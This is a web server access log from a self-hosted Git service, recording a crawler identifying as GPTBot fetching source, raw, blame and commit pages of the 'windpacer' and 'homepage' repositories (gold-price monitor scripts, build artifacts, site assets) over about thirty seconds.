"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:13:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 9868] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:13:47:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17654] [Gzip 8.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:13:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:13:47:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 5792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:13:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 2967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:13:47:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 18099] [Gzip 8.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:13:47:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 14327] [Gzip 7.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:13:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17424] [Gzip 5.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:47:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" [Client 74.7.227.38] [Length 9862] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/Old_GoldMonitor.py" -[17/Feb/2026:13:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 17529] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:13:47:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 9894] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:13:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" [Client 74.7.227.38] [Length 901] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" -[17/Feb/2026:13:47:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" [Client 74.7.227.38] [Length 10421] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/Analysis-00.toc" -[17/Feb/2026:13:47:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71830] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 12292] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor" -[17/Feb/2026:13:47:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 12290] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10983] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:47:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10945] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog" -[17/Feb/2026:13:47:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 17687] [Gzip 8.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:13:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 9901] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:13:47:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 9865] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:13:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" [Client 74.7.227.38] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/GoldMonitor_VeryGood.py" -[17/Feb/2026:13:47:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 5792] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:13:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" [Client 74.7.227.38] [Length 18064] [Gzip 8.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:13:47:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 137900] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 9895] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:13:47:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 9899] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:13:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10935] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:47:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 11504] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:13:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 11505] [Gzip 5.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:13:47:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 725] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:13:47:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 725] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:13:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9972] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:47:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py?display=source" [Client 74.7.227.38] [Length 17543] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_KRX.py" -[17/Feb/2026:13:47:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:47:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153441] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:13:47:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 12262] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/gold_monitor.spec" -[17/Feb/2026:13:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 880569] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:47:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 10194] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:47:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" [Client 74.7.227.38] [Length 2009125] [Gzip 22.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/base_library.zip" -[17/Feb/2026:13:47:40 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor" -[17/Feb/2026:13:47:41 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor" -[17/Feb/2026:13:47:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" [Client 74.7.227.38] [Length 496] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/package.json" -[17/Feb/2026:13:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/status.json" -[17/Feb/2026:13:47:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" [Client 74.7.227.38] [Length 9912] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/Dockerfile" -[17/Feb/2026:13:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14689] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/components" -[17/Feb/2026:13:47:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/BatchControl.png" [Client 74.7.227.38] [Length 1400401] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:13:47:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor.spec" [Client 74.7.227.38] [Length 11445] [Gzip 5.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 